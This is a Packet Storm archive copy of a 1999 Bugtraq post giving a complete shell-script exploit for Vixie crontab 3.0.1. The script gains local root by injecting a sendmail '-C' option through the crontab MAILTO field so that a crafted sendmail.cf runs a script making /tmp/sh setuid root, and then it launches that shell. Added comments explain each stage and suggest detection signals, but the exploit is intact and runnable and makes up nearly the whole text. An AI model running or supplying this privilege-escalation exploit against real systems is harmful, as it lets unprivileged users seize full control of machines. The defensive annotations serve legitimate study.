crontab_exploit.txt

1999-09-19T00:00:00
ID PACKETSTORM:15658
Type packetstorm
Reporter Packet Storm
Modified 1999-09-19T00:00:00

Description

                                        
                                            `Subject: Vixie Crontab exploit code  
To: BUGTRAQ@SECURITYFOCUS.COM   
  
  
Vixie Crontab exploit code  
  
  
begin vixie-ex  
----------------------------------------------------------------------  
#!/bin/sh  
  
  
  
# Vixie crontab exploit  
#  
# Local user can gain root access.  
#  
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0  
# Tested vixie crontab version : 3.0.1  
#  
# This program is for demonstrative use only.  
# USE IT AT YOUR OWN RISK!  
#  
# Programmed by Taeho Oh 1999/08/31  
#  
# Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara  
# PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus  
# PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug  
  
  
  
# Pin PATH to a fixed list of system directories, so the tools invoked below
# (cc/gcc, sed, crontab, ...) are looked up there and not via the caller's PATH.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin  
export PATH  
  
  
  
# Author/affiliation banner only; these echo lines change no system state.
echo  
echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara"  
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"  
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"  
echo  
  
  
  
# Stage: write a small C helper to /tmp/sh.c and compile it to /tmp/sh.
# The helper calls setuid(0) and setgid(0) and then execs /bin/sh. Compiled by
# an ordinary user the binary has no extra privilege; the calls only take
# effect if the file is later made root-owned and setuid.
# Defender note: a newly compiled, shell-like binary in a world-writable
# directory is a useful hunting signal, and mounting /tmp nosuid stops setuid
# bits on files there from being honoured.
echo make shell  
echo  
cat > /tmp/sh.c << EOF  
#include<unistd.h>  
#include<stdlib.h>  
int main()  
{  
setuid(0);  
setgid(0);  
execl("/bin/sh","sh",0);  
return 0;  
}  
EOF  
echo compile shell  
echo  
# Try cc first and fall back to gcc if cc fails or is not installed.
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c  
  
  
  
# Stage: write /tmp/makesh, a three-line script that sets /tmp/sh to owner
# root, group root, mode 4755 (setuid). Run by an unprivileged user the chown
# would be refused; the script only has an effect when something running as
# root executes it.
# Defender note: the resulting artifact is a root-owned, mode-4755 file under
# /tmp, which a periodic search for unexpected setuid files will surface.
echo make execute shell script  
echo  
cat > /tmp/makesh << EOF  
#!/bin/sh  
chown root /tmp/sh  
chgrp root /tmp/sh  
chmod 4755 /tmp/sh  
EOF  
# Make the generated script executable by everyone.
chmod 755 /tmp/makesh  
  
  
  
# Stage: build an altered *copy* of the sendmail configuration in /tmp.
# /etc/sendmail.cf itself is only read, never written.
# Defender note: a sendmail.cf-like file outside /etc, or a sendmail process
# started with -C pointing at a non-system path, is the signal to alert on.
echo hack sendmail.cf  
echo  
# Working copy of the system configuration.
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1  
# Writes a variant with "O DefaultUser=8:12" changed to "O DefaultUser=0:0"
# to /tmp/sendmail.cf.
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf  
# From the working copy again: point the procmail mailer's program path (P=)
# at /tmp/makesh ...
sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2  
# ... and rename its argv (A=) to match.
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3  
# /tmp/sendmail.cf now becomes the P=/A= variant; this cp replaces whatever
# the file held before.
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf  
# Remove the intermediate files; only /tmp/sendmail.cf is kept.
rm -f /tmp/sendmail.cf.tmp1  
rm -f /tmp/sendmail.cf.tmp2  
rm -f /tmp/sendmail.cf.tmp3  
  
  
  
# Stage: create and install a crontab for the current user.
# The heredoc delimiter is unquoted, so `whoami` is expanded when the file is
# written. MAILTO therefore holds "-C/tmp/sendmail.cf <username>": an option
# string followed by a recipient, not a plain address.
# The single job runs "ls" every minute, so each run produces output to mail.
# NOTE(review): this presumably relies on the affected cron passing MAILTO to
# the mail program's command line unvalidated -- confirm against the vendor
# advisory for the cron version in use.
# Defender note: audit user crontabs for MAILTO values that begin with "-" or
# contain whitespace, and run a cron release that validates MAILTO.
echo make cron file  
echo  
cat > /tmp/cronfile << EOF  
MAILTO=-C/tmp/sendmail.cf `whoami`  
* * * * * ls  
EOF  
echo input cron file  
echo  
# Installs the file as the invoking user's crontab, replacing any existing one.
crontab /tmp/cronfile  
  
  
  
# Sleep until about five seconds past the next minute boundary, so the
# every-minute cron job installed above has had one chance to run.
echo wait for 1 minute  
echo  
# Seconds field of the current time (00-59).
sec=`date +%S`  
# 65 - sec = seconds left in this minute plus a 5-second margin.
wait=`expr 65 - $sec`  
sleep $wait  
  
  
  
# Run the helper compiled earlier. It only yields a privileged shell if
# /tmp/sh has become root-owned and setuid by now; otherwise its
# setuid(0)/setgid(0) calls fail and an ordinary shell starts.
# Defender note: process-execution telemetry showing a setuid-root binary under
# /tmp being run by an unprivileged account is a high-confidence alert.
echo execute shell  
echo  
/tmp/sh  
  
  
  
# Cleanup: runs only after the shell started above has exited.
# It removes the staged config, crontab source, helper script and C source.
# /tmp/sh is not in the rm list, so the compiled binary stays on disk.
# Defender note: a leftover /tmp/sh is durable evidence after the other files
# are gone. NOTE(review): check whether local cron/syslog records the crontab
# replacements made by this script.
echo delete data files  
echo  
cd /tmp  
rm -f sendmail.cf cronfile makesh sh.c  
# Replace the user's crontab with an empty one, removing the every-minute job.
crontab /dev/null  
----------------------------------------------------------------------  
end vixie-ex  
  
  
--  
  
  
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara  
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus  
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug  
`